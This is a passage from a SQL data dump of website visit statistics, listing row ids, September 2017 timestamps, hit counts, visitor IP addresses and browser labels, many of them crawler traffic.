'217.182.132.176','other'),(156743,1505459852,1,1,0,0,'217.182.132.61','other'),(156744,1505460370,1,1,0,0,'91.209.11.236','other'),(156745,1505460636,1,1,0,0,'91.196.178.169','chrome'),(156746,1505461281,1,1,0,0,'207.154.249.126','chrome'),(156747,1505461360,1,1,0,0,'51.255.65.74','other'),(156748,1505462679,1,1,0,0,'66.249.76.109','chrome'),(156749,1505462888,2,2,0,0,'5.45.207.64','other'),(156750,1505462979,1,1,0,0,'91.196.178.67','chrome'),(156751,1505463076,1,1,0,0,'51.255.65.39','other'),(156752,1505463745,1,1,0,0,'40.77.167.46','other'),(156753,1505463851,1,1,0,0,'91.196.178.71','chrome'),(156754,1505463926,1,1,0,0,'5.45.207.64','other'),(156755,1505463961,1,1,0,0,'137.74.207.170','other'),(156756,1505464029,1,1,0,0,'51.255.71.101','other'),(156757,1505464281,1,1,0,0,'91.196.178.169','chrome'),(156758,1505464432,1,1,0,0,'217.182.132.192','other'),(156759,1505464512,1,1,0,0,'51.255.65.57','other'),(156760,1505464833,1,1,0,0,'51.255.65.70','other'),(156761,1505464865,1,1,0,0,'91.196.178.166','chrome'),(156762,1505464928,1,1,0,0,'51.255.65.59','other'),(156763,1505465457,1,1,0,0,'51.255.65.16','other'),(156764,1505466230,1,1,0,0,'164.132.162.154','other'),(156765,1505466810,1,1,0,0,'95.132.68.189','firefox'),(156766,1505466859,1,1,0,0,'31.43.10.41','chrome'),(156767,1505466870,1,1,0,0,'217.182.132.65','other'),(156768,1505466947,1,1,0,0,'91.196.178.37','chrome'),(156769,1505467162,1,1,0,0,'51.255.65.48','other'),(156770,1505467223,1,1,0,0,'8.29.198.27','other'),(156771,1505467856,1,1,0,0,'157.55.39.192','other'),(156772,1505468135,1,0,1,0,'66.249.66.76',''),(156773,1505468683,1,1,0,0,'51.255.65.13','other'),(156774,1505468729,1,1,0,0,'217.182.132.51','other'),(156775,1505469044,1,0,1,0,'66.249.76.93',''),(156776,1505469220,1,1,0,0,'164.132.162.187','other'),(156777,1505469316,1,1,0,0,'217.182.132.18','other'),(156778,1505469774,1,1,0,0,'141.8.183.1','other'),(156779,1505469848,1,1,0,0,'66.249.76.89','chrome'),(156780,1505471065,1,1,0,0,'5.45.207.32','other'),(156781,1505471335,1,1,0,0,'91.196.178.70','firefox'),(156782,1505471689,3,3,0,0,'5.45.207.64','other'),(156783,1505471700,1,1,0,0,'217.182.132.76','other'),(156784,1505471881,1,1,0,0,'217.182.132.63','other'),(156785,1505472049,1,1,0,0,'91.209.11.236','other'),(156786,1505472123,1,1,0,0,'107.167.107.248','other'),(156787,1505472151,1,1,0,0,'51.255.65.80','other'),(156788,1505472551,1,1,0,0,'66.249.76.109','chrome'),(156789,1505472889,1,1,0,0,'51.255.65.92','other'),(156790,1505472890,2,2,0,0,'5.45.207.64','other'),(156791,1505473340,1,1,0,0,'207.46.13.184','other'),(156792,1505473364,1,1,0,0,'141.8.183.1','other'),(156793,1505473487,1,1,0,0,'91.209.11.236','other'),(156794,1505473819,2,2,0,0,'144.76.6.230','other'),(156795,1505473825,1,1,0,0,'217.182.132.96','other'),(156796,1505473833,1,1,0,0,'217.182.132.93','other'),(156797,1505473857,1,1,0,0,'164.132.162.156','other'),(156798,1505474126,1,1,0,0,'188.163.16.6','chrome'),(156799,1505474233,1,1,0,0,'91.196.178.131','chrome'),(156800,1505474919,1,1,0,0,'91.209.11.236','other'),(156801,1505475093,1,1,0,0,'217.182.132.60','other'),(156802,1505475104,1,1,0,0,'217.66.158.111','chrome'),(156803,1505475115,2,2,0,0,'141.8.183.1','other'),(156804,1505475316,2,2,0,0,'5.45.207.64','other'),(156805,1505475641,1,1,0,0,'54.165.59.7','other'),(156806,1505476305,1,1,0,0,'51.255.65.70','other'),(156807,1505476409,1,1,0,0,'217.182.132.147','other'),(156808,1505476843,1,1,0,0,'91.209.11.236','other'),(156809,1505477007,1,1,0,0,'108.59.8.80','other'),(156810,1505477286,1,1,0,0,'217.182.132.177','other'),(156811,1505477329,1,1,0,0,'51.255.71.122','other'),(156812,1505477747,1,1,0,0,'95.132.26.160','msie'),(156813,1505477788,1,1,0,0,'217.182.132.16','other'),(156814,1505478065,1,1,0,0,'8.29.198.26','other'),(156815,1505478460,1,0,1,0,'66.249.76.93',''),(156816,1505478693,1,1,0,0,'51.255.65.19','other'),(156817,1505478743,1,1,0,0,'91.209.11.236','other'),(156818,1505479210,1,1,0,0,'51.255.65.8','other'),(156819,1505479486,1,1,0,0,'217.182.132.148','other'),(156820,1505479811,1,1,0,0,'5.45.207.64','other'),(156821,1505480737,1,1,0,0,'91.209.11.236','other'),(156822,1505480810,1,1,0,0,'95.135.89.153','firefox'),(156823,1505481316,1,1,0,0,'91.196.178.165','chrome'),(156824,1505481649,1,1,0,0,'91.196.178.166','chrome'),(156825,1505481794,1,1,0,0,'51.255.65.10','other'),(156826,1505482193,1,1,0,0,'91.209.11.236','other'),(156827,1505482963,1,1,0,0,'31.43.6.98','chrome'),(156828,1505483167,1,1,0,0,'207.241.231.164','other'),(156829,1505483187,1,0,1,0,'66.249.66.199',''),(156830,1505483535,1,1,0,0,'217.182.132.149','other'),(156831,1505483987,1,1,0,0,'66.249.76.107','chrome'),(156832,1505484354,3,3,0,0,'104.168.141.245','other'),(156833,1505484386,1,1,0,0,'217.182.132.29','other'),(156834,1505484458,1,1,0,0,'51.255.65.13','other'),(156835,1505484514,1,1,0,0,'178.154.171.59','other'),(156836,1505484539,1,1,0,0,'217.182.132.53','other'),(156837,1505485137,1,1,0,0,'91.209.11.236','other'),(156838,1505485138,1,1,0,0,'217.182.132.179','other'),(156839,1505485218,1,0,1,0,'66.249.66.76',''),(156840,1505485339,1,1,0,0,'141.8.183.20','other'),(156841,1505486953,1,1,0,0,'217.182.132.170','other'),(156842,1505487052,1,1,0,0,'51.255.65.49','other'),(156843,1505487403,2,2,0,0,'5.45.207.64','other'),(156844,1505487518,1,1,0,0,'91.209.11.236','other'),(156845,1505488276,1,1,0,0,'37.9.113.128','other'),(156846,1505488355,2,2,0,0,'66.249.66.199','chrome'),(156847,1505488912,1,0,1,0,'66.249.76.108',''),(156848,1505488926,1,1,0,0,'8.29.198.25','other'),(156849,1505488941,1,1,0,0,'217.69.133.85','other'),(156850,1505488994,1,1,0,0,'141.8.183.1','other'),(156851,1505489017,1,1,0,0,'192.241.247.133','chrome'),(156852,1505489236,1,1,0,0,'107.167.105.99','opera'),(156853,1505489299,1,1,0,0,'91.196.178.38','chrome'),(156854,1505489657,1,1,0,0,'46.48.13.161','msie'),(156855,1505489689,1,0,1,0,'66.249.76.91',''),(156856,1505489738,5,5,0,0,'104.168.141.245','other'),(156857,1505489755,1,1,0,0,'51.255.65.53','other'),(156858,1505490236,1,1,0,0,'5.45.207.64','other'),(156859,1505490489,1,1,0,0,'51.255.65.31','other'),(156860,1505490734,1,1,0,0,'141.8.142.21','other'),(156861,1505490886,1,1,0,0,'217.182.132.58','other'),(156862,1505490926,1,1,0,0,'204.79.180.5','msie'),(156863,1505491484,1,1,0,0,'51.255.65.20','other'),(156864,1505491504,2,2,0,0,'91.196.178.101','firefox'),(156865,1505491626,1,0,1,0,'66.249.76.91',''),(156866,1505491677,1,1,0,0,'40.77.167.36','other'),(156867,1505491781,1,1,0,0,'37.54.22.131','chrome'),(156868,1505492638,1,1,0,0,'91.209.11.236','other'),(156869,1505492837,1,1,0,0,'217.182.132.94','other'),(156870,1505492966,2,2,0,0,'5.45.207.64','other'),(156871,1505493027,2,2,0,0,'217.69.133.203','other'),(156872,1505493323,1,1,0,0,'51.255.65.56','other'),(156873,1505493399,1,1,0,0,'40.77.167.36','other'),(156874,1505493460,1,1,0,0,'66.249.66.199','chrome'),(156875,1505493612,1,1,0,0,'91.196.178.135','chrome'),(156876,1505494054,1,1,0,0,'51.255.65.33','other'),(156877,1505494128,1,0,1,0,'66.249.76.107',''),(156878,1505494315,1,1,0,0,'91.196.178.70','firefox'),(156879,1505494682,2,2,0,0,'91.209.11.236','other'),(156880,1505494745,1,1,0,0,'137.74.207.110','other'),(156881,1505495370,1,1,0,0,'217.182.132.65','other'),(156882,1505495535,1,1,0,0,'51.255.71.113','other'),(156883,1505495600,1,1,0,0,'151.80.27.116','other'),(156884,1505495838,1,0,1,0,'66.249.76.109',''),(156885,1505495887,1,1,0,0,'51.255.65.40','other'),(156886,1505496595,1,0,1,0,'66.249.76.107',''),(156887,1505496838,1,1,0,0,'51.255.71.100','other'),(156888,1505497007,1,1,0,0,'217.182.132.28','other'),(156889,1505497027,1,1,0,0,'95.132.78.110','firefox'),(156890,1505497334,1,1,0,0,'51.255.65.75','other'),(156891,1505497681,1,1,0,0,'37.73.226.144','chrome'),(156892,1505497828,1,1,0,0,'217.182.132.79','other'),(156893,1505497907,1,1,0,0,'217.182.132.50','other'),(156894,1505498124,1,1,0,0,'95.108.181.69','other'),(156895,1505498899,1,1,0,0,'51.255.65.14','other'),(156896,1505498986,1,1,0,0,'5.255.253.33','other'),(156897,1505499115,1,1,0,0,'51.255.65.88','other'),(156898,1505499123,1,1,0,0,'51.255.65.25','other'),(156899,1505499243,1,1,0,0,'217.182.132.93','other'),(156900,1505499768,1,1,0,0,'8.29.198.26','other'),(156901,1505499873,1,1,0,0,'217.182.132.185','other'),(156902,1505500068,1,1,0,0,'51.255.65.3','other'),(156903,1505500287,1,1,0,0,'107.167.104.84','opera'),(156904,1505500372,1,1,0,0,'164.132.162.156','other'),(156905,1505500690,1,0,1,0,'66.249.66.195',''),(156906,1505500845,1,1,0,0,'217.182.132.90','other'),(156907,1505501012,1,1,0,0,'5.255.253.2','other'),(156908,1505502032,1,1,0,0,'87.250.224.150','other'),(156909,1505502080,1,1,0,0,'51.255.65.92','other'),(156910,1505502088,1,1,0,0,'201.18.18.173','firefox'),(156911,1505502157,1,1,0,0,'51.255.65.94','other'),(156912,1505502302,1,1,0,0,'51.255.65.72','other'),(156913,1505502569,1,1,0,0,'164.132.162.160','other'),(156914,1505502696,2,2,0,0,'91.196.178.133','firefox'),(156915,1505503757,1,1,0,0,'51.255.65.97','other'),(156916,1505504281,1,1,0,0,'51.255.65.95','other'),(156917,1505504534,1,1,0,0,'5.45.207.64','other'),(156918,1505504550,1,1,0,0,'217.182.132.193','other'),(156919,1505505041,1,1,0,0,'51.255.65.78','other'),(156920,1505505183,1,1,0,0,'141.8.183.1','other'),(156921,1505505402,1,1,0,0,'195.10.210.70','chrome'),(156922,1505505413,1,1,0,0,'117.185.27.113','chrome'),(156923,1505505482,1,1,0,0,'141.8.183.20','other'),(156924,1505505485,1,1,0,0,'141.8.183.5','other'),(156925,1505505820,1,1,0,0,'51.255.71.100','other'),(156926,1505506240,1,1,0,0,'164.132.162.164','other'),(156927,1505506254,1,1,0,0,'107.167.107.6','other'),(156928,1505506842,2,2,0,0,'5.45.207.64','other'),(156929,1505507026,1,1,0,0,'137.74.207.170','other'),(156930,1505507341,1,0,1,0,'66.249.66.76',''),(156931,1505507717,1,1,0,0,'164.132.162.160','other'),(156932,1505507913,1,1,0,0,'66.249.66.75','chrome'),(156933,1505508145,1,1,0,0,'51.255.71.127','other'),(156934,1505508489,1,1,0,0,'217.182.132.153','other'),(156935,1505508497,1,1,0,0,'5.45.207.64','other'),(156936,1505508898,1,1,0,0,'217.182.132.65','other'),(156937,1505509373,1,1,0,0,'51.255.65.38','other'),(156938,1505509468,1,1,0,0,'80.241.214.123','other'),(156939,1505509780,1,1,0,0,'51.255.65.42','other'),(156940,1505510059,1,1,0,0,'217.182.132.178','other'),(156941,1505510064,1,1,0,0,'5.45.207.64','other'),(156942,1505510617,1,1,0,0,'8.29.198.26','other'),(156943,1505510944,1,1,0,0,'51.255.71.113','other'),(156944,1505511103,1,1,0,0,'51.255.71.131','other'),(156945,1505511712,1,1,0,0,'51.255.65.49','other'),(156946,1505511866,1,1,0,0,'51.255.65.40','other'),(156947,1505512119,1,1,0,0,'51.255.71.125','other'),(156948,1505512220,2,2,0,0,'54.165.59.7','other'),(156949,1505512473,1,0,1,0,'66.249.66.76',''),(156950,1505512782,1,1,0,0,'217.182.132.5','other'),(156951,1505513019,1,1,0,0,'51.255.65.41','other'),(156952,1505513476,1,1,0,0,'51.255.71.115','other'),(156953,1505513478,1,1,0,0,'217.69.133.5','other'),(156954,1505513898,1,0,1,0,'66.249.76.91',''),(156955,1505514238,1,0,1,0,'66.249.76.107',''),(156956,1505515521,1,1,0,0,'91.209.11.236','other'),(156957,1505515985,1,1,0,0,'217.69.133.203','other'),(156958,1505516038,1,1,0,0,'141.8.183.1','other'),(156959,1505516374,1,1,0,0,'51.255.65.80','other'),(156960,1505516657,1,1,0,0,'51.255.71.98','other'),(156961,1505517047,1,1,0,0,'40.77.167.46','other'),(156962,1505517066,1,1,0,0,'141.8.183.1','other'),(156963,1505517102,1,1,0,0,'51.255.71.122','other'),(156964,1505517157,2,2,0,0,'91.209.11.236','other'),(156965,1505517367,1,1,0,0,'217.182.132.90','other'),(156966,1505517991,2,2,0,0,'5.45.207.64','other'),(156967,1505518260,1,1,0,0,'164.132.162.159','other'),(156968,1505518288,1,1,0,0,'217.182.132.27','other'),(156969,1505518365,1,1,0,0,'141.8.183.1','other'),(156970,1505518679,1,1,0,0,'217.182.132.67','other'),(156971,1505518843,1,1,0,0,'51.255.65.56','other'),(156972,1505519379,1,1,0,0,'91.209.11.236','other'),(156973,1505519762,1,1,0,0,'217.182.132.76','other'),(156974,1505519956,1,1,0,0,'51.255.65.42','other'),(156975,1505520120,1,1,0,0,'5.45.207.64','other'),(156976,1505520644,1,1,0,0,'180.76.15.28','other'),(156977,1505521142,1,1,0,0,'217.182.132.154','other'),(156978,1505521211,1,1,0,0,'91.209.11.236','other'),(156979,1505521377,1,1,0,0,'51.255.65.73','other'),(156980,1505521458,1,1,0,0,'8.29.198.27','other'),(156981,1505521527,1,1,0,0,'178.154.200.7','other'),(156982,1505521609,1,1,0,0,'217.182.132.78','other'),(156983,1505521613,1,1,0,0,'51.255.65.7','other'),(156984,1505521696,1,1,0,0,'51.255.65.12','other'),(156985,1505521932,1,1,0,0,'137.74.207.120','other'),(156986,1505522011,1,1,0,0,'5.45.207.64','other'),(156987,1505523074,1,1,0,0,'217.182.132.25','other'),(156988,1505523099,1,1,0,0,'91.209.11.236','other'),(156989,1505523216,1,1,0,0,'51.255.65.80','other'),(156990,1505523552,1,1,0,0,'51.255.71.130','other'),(156991,1505523836,1,1,0,0,'217.182.132.184','other'),(156992,1505524657,2,2,0,0,'5.45.207.64','other'),(156993,1505524739,1,1,0,0,'178.159.37.105','firefox'),(156994,1505524777,1,1,0,0,'137.74.207.116','other'),(156995,1505525541,1,1,0,0,'141.8.142.43','other'),(156996,1505525826,1,1,0,0,'51.255.71.122','other'),(156997,1505525886,1,1,0,0,'217.182.132.80','other'),(156998,1505526306,1,1,0,0,'51.255.65.20','other'),(156999,1505526390,1,1,0,0,'217.182.132.82','other'),(157000,1505526812,1,1,0,0,'91.209.11.236','other'),(157001,1505527603,1,1,0,0,'217.182.132.63','other'),(157002,1505527633,2,2,0,0,'5.45.207.64','other'),(157003,1505528387,1,1,0,0,'51.255.65.95','other'),(157004,1505528645,1,1,0,0,'5.45.207.64','other'),(157005,1505529007,1,0,1,0,'66.249.76.108',''),(157006,1505529075,1,0,1,0,'66.249.76.89',''),(157007,1505529194,2,2,0,0,'141.8.183.1','other'),(157008,1505530014,1,1,0,0,'5.45.207.64','other'),(157009,1505530490,5,5,0,0,'192.99.203.35','other'),(157010,1505530958,1,1,0,0,'51.255.65.13','other'),(157011,1505531219,1,1,0,0,'51.255.65.95','other'),(157012,1505531518,1,1,0,0,'141.8.183.1','other'),(157013,1505532287,1,1,0,0,'8.29.198.27','other'),(157014,1505532350,1,1,0,0,'217.182.132.153','other'),(157015,1505532354,1,1,0,0,'95.108.181.60','other'),(157016,1505533869,1,1,0,0,'137.74.207.170','other'),(157017,1505534261,1,1,0,0,'51.255.65.29','other'),(157018,1505534264,1,1,0,0,'51.255.65.63','other'),(157019,1505534321,1,1,0,0,'217.182.132.241','other'),(157020,1505534519,1,1,0,0,'217.182.132.15','other'),(157021,1505535359,1,1,0,0,'51.255.71.116','other'),(157022,1505535577,1,1,0,0,'141.8.183.1','other'),(157023,1505535954,2,2,0,0,'5.45.207.64','other'),(157024,1505536384,1,1,0,0,'51.255.65.88','other'),(157025,1505536576,1,1,0,0,'164.132.162.160','other'),(157026,1505537209,1,1,0,0,'5.45.207.64','other'),(157027,1505537761,1,1,0,0,'91.209.11.236','other'),(157028,1505538211,1,1,0,0,'137.74.207.188','other'),(157029,1505538339,2,2,0,0,'5.45.207.64','other'),(157030,1505538384,1,1,0,0,'141.8.183.1','other'),(157031,1505538407,1,1,0,0,'217.182.132.175','other'),(157032,1505538609,1,1,0,0,'217.182.132.157','other'),(157033,1505539193,3,3,0,0,'91.209.11.236','other'),(157034,1505539264,1,1,0,0,'51.255.65.49','other'),(157035,1505539479,1,1,0,0,'51.255.65.32','other'),(157036,1505540004,2,2,0,0,'5.45.207.64','other'),(157037,1505540516,1,1,0,0,'141.8.183.1','other'),(157038,1505541087,1,1,0,0,'217.182.132.72','other'),(157039,1505541204,2,2,0,0,'5.45.207.64','other'),(157040,1505541507,1,1,0,0,'51.255.65.67','other'),(157041,1505541916,1,1,0,0,'51.255.65.28','other'),(157042,1505542030,1,1,0,0,'91.209.11.236','other'),(157043,1505542433,1,1,0,0,'51.255.65.224','other'),(157044,1505542963,1,1,0,0,'137.74.207.110','other'),(157045,1505543125,1,1,0,0,'8.29.198.25','other'),(157046,1505543224,1,1,0,0,'51.255.65.5','other'),(157047,1505543996,1,1,0,0,'51.255.71.120','other'),(157048,1505544865,1,1,0,0,'51.255.71.133','other'),(157049,1505546461,2,2,0,0,'141.8.183.1','other'),(157050,1505546519,1,0,1,0,'66.249.66.75',''),(157051,1505547215,3,3,0,0,'5.45.207.64','other'),(157052,1505547294,1,1,0,0,'217.69.133.3','other'),(157053,1505547336,1,1,0,0,'217.182.132.76','other'),(157054,1505548456,1,1,0,0,'51.255.65.37','other'),(157055,1505548498,18,18,0,0,'176.9.50.117','other'),(157056,1505548602,1,1,0,0,'91.209.11.236','other'),(157057,1505548728,1,1,0,0,'217.182.132.71','other'),(157058,1505548861,1,1,0,0,'204.79.180.16','msie'),(157059,1505549603,1,1,0,0,'217.182.132.6','other'),(157060,1505549796,1,1,0,0,'141.8.183.1','other'),(157061,1505549863,1,1,0,0,'51.255.71.115','other'),(157062,1505550506,1,1,0,0,'66.249.76.91','chrome'),(157063,1505550821,1,1,0,0,'164.132.162.164','other'),(157064,1505550865,2,2,0,0,'141.8.183.1','other'),(157065,1505551164,1,1,0,0,'40.77.167.46','other'),(157066,1505551215,1,1,0,0,'217.182.132.181','other'),(157067,1505551289,7,7,0,0,'5.9.144.234','other'),(157068,1505551471,1,0,1,0,'66.249.76.91',''),(157069,1505551483,1,0,1,0,'66.249.66.199',''),(157070,1505552017,1,1,0,0,'95.108.181.58','other'),(157071,1505552032,1,1,0,0,'178.154.200.7','other'),(157072,1505552922,1,1,0,0,'137.74.207.102','other'),(157073,1505553026,1,1,0,0,'204.79.180.7','msie'),(157074,1505553957,1,1,0,0,'8.29.198.25','other'),(157075,1505554421,1,1,0,0,'217.69.133.2','other'),(157076,1505554457,1,1,0,0,'217.182.132.74','other'),(157077,1505554564,1,1,0,0,'141.8.142.21','other'),(157078,1505554708,1,1,0,0,'216.244.66.237','other'),(157079,1505555229,1,1,0,0,'164.132.162.160','other'),(157080,1505555633,1,1,0,0,'40.77.167.36','other'),(157081,1505555776,1,1,0,0,'217.182.132.84','other'),(157082,1505556272,1,0,1,0,'66.249.76.89',''),(157083,1505556413,1,1,0,0,'51.255.65.90','other'),(157084,1505556423,1,1,0,0,'137.74.207.116','other'),(157085,1505556962,1,1,0,0,'5.45.207.64','other'),(157086,1505557434,1,1,0,0,'91.209.11.236','other'),(157087,1505558048,1,1,0,0,'5.45.207.64','other'),(157088,1505558169,1,1,0,0,'217.182.132.82','other'),(157089,1505558719,2,2,0,0,'51.255.71.116','other'),(157090,1505558846,1,1,0,0,'217.182.132.240','other'),(157091,1505559078,1,1,0,0,'51.255.65.55','other'),(157092,1505559099,1,1,0,0,'180.76.15.159','other'),(157093,1505559278,1,1,0,0,'217.182.132.74','other'),(157094,1505559311,1,1,0,0,'217.182.132.29','other'),(157095,1505559634,1,1,0,0,'51.255.65.74','other'),(157096,1505559826,1,1,0,0,'217.182.132.66','other'),(157097,1505559840,1,1,0,0,'91.209.11.236','other'),(157098,1505559866,1,1,0,0,'217.69.133.194','other'),(157099,1505560884,1,1,0,0,'137.74.207.159','other'),(157100,1505561782,1,1,0,0,'91.196.178.34','chrome'),(157101,1505562184,1,1,0,0,'199.58.86.209','other'),(157102,1505562266,1,1,0,0,'217.182.132.29','other'),(157103,1505562662,1,1,0,0,'217.182.132.85','other'),(157104,1505563494,1,1,0,0,'141.8.183.1','other'),(157105,1505564271,1,1,0,0,'164.132.162.155','other'),(157106,1505564618,1,1,0,0,'217.69.133.217','other'),(157107,1505564789,1,1,0,0,'8.29.198.27','other'),(157108,1505564892,1,1,0,0,'217.182.132.15','other'),(157109,1505565364,1,1,0,0,'137.74.201.99','other'),(157110,1505565524,1,1,0,0,'40.77.167.36','other'),(157111,1505565608,1,1,0,0,'141.8.142.21','other'),(157112,1505565729,1,1,0,0,'176.77.26.192','msie'),(157113,1505565941,1,1,0,0,'51.255.65.87','other'),(157114,1505566287,1,1,0,0,'54.165.59.7','other'),(157115,1505566481,2,2,0,0,'217.182.132.56','other'),(157116,1505567140,1,1,0,0,'5.45.207.64','other'),(157117,1505567642,1,1,0,0,'177.47.27.202','other'),(157118,1505567831,1,1,0,0,'217.182.132.240','other'),(157119,1505567927,1,1,0,0,'95.28.191.173','msie'),(157120,1505568074,1,1,0,0,'51.255.71.131','other'),(157121,1505568144,1,1,0,0,'107.167.106.76','opera'),(157122,1505568182,1,1,0,0,'51.255.65.64','other'),(157123,1505568206,1,1,0,0,'217.182.132.80','other'),(157124,1505569062,1,1,0,0,'51.255.65.67','other'),(157125,1505569855,1,1,0,0,'141.8.183.1','other'),(157126,1505570002,1,1,0,0,'137.74.207.116','other'),(157127,1505570011,1,1,0,0,'91.196.178.135','chrome'),(157128,1505570169,1,1,0,0,'217.182.132.20','other'),(157129,1505570197,1,1,0,0,'177.47.27.202','other'),(157130,1505570270,2,2,0,0,'91.209.11.236','other'),(157131,1505570331,1,1,0,0,'217.182.132.241','other'),(157132,1505571153,1,1,0,0,'91.196.178.135','firefox'),(157133,1505571202,1,1,0,0,'91.196.178.164','chrome'),(157134,1505571314,1,1,0,0,'180.76.15.154','other'),(157135,1505572252,1,1,0,0,'91.209.11.236','other'),(157136,1505573622,1,1,0,0,'66.249.93.91','chrome'),(157137,1505574228,1,1,0,0,'91.209.11.236','other'),(157138,1505574448,1,1,0,0,'107.167.106.76','opera'),(157139,1505574978,1,1,0,0,'180.76.15.147','other'),(157140,1505575246,1,1,0,0,'195.10.210.49','chrome'),(157141,1505575258,1,1,0,0,'46.188.18.138','chrome'),(157142,1505575622,1,1,0,0,'8.29.198.25','other'),(157143,1505575658,1,1,0,0,'107.167.104.181','opera'),(157144,1505575922,1,1,0,0,'40.77.167.1','other'),(157145,1505576589,1,1,0,0,'137.74.207.102','other'),(157146,1505576682,1,1,0,0,'217.182.132.17','other'),(157147,1505576901,1,1,0,0,'217.182.132.22','other'),(157148,1505577490,1,1,0,0,'217.182.132.174','other'),(157149,1505577755,1,1,0,0,'5.45.207.64','other'),(157150,1505577818,1,1,0,0,'51.255.65.12','other'),(157151,1505578305,1,1,0,0,'185.137.18.122','chrome'),(157152,1505578544,1,1,0,0,'40.77.167.1','other'),(157153,1505579773,3,3,0,0,'46.229.168.68','other'),(157154,1505579792,1,1,0,0,'217.182.132.18','other'),(157155,1505579809,3,3,0,0,'46.229.168.76','other'),(157156,1505579815,6,6,0,0,'46.229.168.72','other'),(157157,1505579823,1,1,0,0,'40.77.167.1','other'),(157158,1505579827,6,6,0,0,'46.229.168.67','other'),(157159,1505579861,5,5,0,0,'46.229.168.80','other'),(157160,1505579910,7,7,0,0,'46.229.168.77','other'),(157161,1505579929,6,6,0,0,'46.229.168.78','other'),(157162,1505579937,2,2,0,0,'46.229.168.75','other'),(157163,1505579992,6,6,0,0,'46.229.168.79','other'),(157164,1505580051,4,4,0,0,'46.229.168.66','other'),(157165,1505580119,6,6,0,0,'46.229.168.73','other'),(157166,1505580137,2,2,0,0,'46.229.168.69','other'),(157167,1505580174,6,6,0,0,'46.229.168.70','other'),(157168,1505580181,1,1,0,0,'217.182.132.87','other'),(157169,1505580229,6,6,0,0,'46.229.168.71','other'),(157170,1505580356,6,6,0,0,'46.229.168.74','other'),(157171,1505580375,1,1,0,0,'46.101.136.205','chrome'),(157172,1505580519,4,4,0,0,'66.249.83.6','chrome'),(157173,1505580520,1,1,0,0,'66.249.88.156','chrome'),(157174,1505580551,2,2,0,0,'66.249.83.4','chrome'),(157175,1505580615,4,4,0,0,'66.102.7.25','chrome'),(157176,1505580642,2,2,0,0,'66.102.7.23','chrome'),(157177,1505580686,2,2,0,0,'66.249.83.8','chrome'),(157178,1505580720,4,4,0,0,'46.229.168.76','other'),(157179,1505580749,1,1,0,0,'66.249.84.38','chrome'),(157180,1505580764,1,1,0,0,'66.102.7.24','chrome'),(157181,1505580812,2,2,0,0,'46.229.168.72','other'),(157182,1505580848,3,3,0,0,'46.229.168.75','other'),(157183,1505580866,1,1,0,0,'46.229.168.67','other'),(157184,1505580989,3,3,0,0,'46.229.168.66','other'),(157185,1505581047,3,3,0,0,'46.229.168.68','other'),(157186,1505581115,3,3,0,0,'46.229.168.79','other'),(157187,1505581156,2,2,0,0,'46.229.168.70','other'),(157188,1505581214,3,3,0,0,'46.229.168.78','other'),(157189,1505581282,1,1,0,0,'46.229.168.65','other'),(157190,1505581685,1,1,0,0,'217.182.132.73','other'),(157191,1505582621,1,1,0,0,'51.255.71.114','other'),(157192,1505582853,1,1,0,0,'51.255.71.116','other'),(157193,1505583918,1,1,0,0,'5.45.207.64','other'),(157194,1505584745,1,1,0,0,'51.255.65.20','other'),(157195,1505584842,1,1,0,0,'78.111.190.218','other'),(157196,1505584961,1,1,0,0,'51.255.65.61','other'),(157197,1505585480,1,1,0,0,'217.182.132.31','other'),(157198,1505586455,1,1,0,0,'8.29.198.26','other'),(157199,1505586779,1,1,0,0,'217.182.132.85','other'),(157200,1505587304,1,1,0,0,'151.80.27.116','other'),(157201,1505587488,1,1,0,0,'51.255.71.118','other'),(157202,1505588611,1,1,0,0,'51.255.65.61','other'),(157203,1505588743,1,1,0,0,'107.167.108.77','opera'),(157204,1505589144,1,1,0,0,'51.255.65.67','other'),(157205,1505589235,1,1,0,0,'216.244.66.237','other'),(157206,1505589395,1,1,0,0,'91.196.178.38','chrome'),(157207,1505589436,1,1,0,0,'40.77.167.46','other'),(157208,1505590370,1,1,0,0,'5.45.207.64','other'),(157209,1505590403,1,1,0,0,'91.209.11.236','other'),(157210,1505590448,1,1,0,0,'91.196.178.38','chrome'),(157211,1505590825,1,1,0,0,'51.255.65.89','other'),(157212,1505590884,1,1,0,0,'51.255.65.6','other'),(157213,1505591125,1,1,0,0,'95.132.22.114','chrome'),(157214,1505591532,1,1,0,0,'217.182.132.23','other'),(157215,1505591622,1,1,0,0,'141.8.183.1','other'),(157216,1505592263,1,1,0,0,'91.209.11.236','other'),(157217,1505592415,2,2,0,0,'5.45.207.64','other'),(157218,1505592572,1,1,0,0,'40.77.167.46','other'),(157219,1505592859,1,1,0,0,'51.255.71.101','other'),(157220,1505593065,1,1,0,0,'46.211.2.96','chrome'),(157221,1505593248,1,1,0,0,'217.182.132.17','other'),(157222,1505593677,1,1,0,0,'51.255.65.52','other'),(157223,1505593695,1,1,0,0,'91.209.11.236','other'),(157224,1505593719,1,1,0,0,'5.45.207.64','other'),(157225,1505594590,1,1,0,0,'40.77.167.46','other'),(157226,1505594599,1,1,0,0,'217.182.132.80','other'),(157227,1505594661,1,1,0,0,'180.76.15.26','other'),(157228,1505594670,1,1,0,0,'217.182.132.20','other'),(157229,1505594755,1,1,0,0,'217.182.132.62','other'),(157230,1505594806,1,1,0,0,'217.182.132.56','other'),(157231,1505595703,1,1,0,0,'141.8.183.1','other'),(157232,1505596003,1,1,0,0,'81.1.242.33','other'),(157233,1505596182,1,1,0,0,'51.255.65.38','other'),(157234,1505596795,1,1,0,0,'217.182.132.17','other'),(157235,1505597197,1,1,0,0,'217.182.132.148','other'),(157236,1505597290,1,1,0,0,'8.29.198.26','other'),(157237,1505597392,1,1,0,0,'40.77.167.1','other'),(157238,1505598676,1,1,0,0,'217.182.132.16','other'),(157239,1505599288,1,1,0,0,'217.182.132.241','other'),(157240,1505599316,1,1,0,0,'217.182.132.82','other'),(157241,1505599811,1,1,0,0,'40.77.167.36','other'),(157242,1505601125,1,1,0,0,'87.250.224.86','other'),(157243,1505601697,1,1,0,0,'141.8.142.17','other'),(157244,1505601853,1,1,0,0,'137.74.207.170','other'),(157245,1505602738,1,1,0,0,'217.182.132.68','other'),(157246,1505603448,1,1,0,0,'51.255.65.67','other'),(157247,1505603556,1,1,0,0,'51.255.65.3','other'),(157248,1505603975,1,1,0,0,'51.255.71.117','other'),(157249,1505604108,1,1,0,0,'51.255.65.96','other'),(157250,1505604578,1,1,0,0,'217.182.132.24','other'),(157251,1505605466,1,1,0,0,'5.45.207.64','other'),(157252,1505606076,1,1,0,0,'51.255.65.38','other'),(157253,1505606560,1,1,0,0,'51.255.65.22','other'),(157254,1505606960,1,1,0,0,'5.45.207.64','other'),(157255,1505607088,1,1,0,0,'157.55.39.42','other'),(1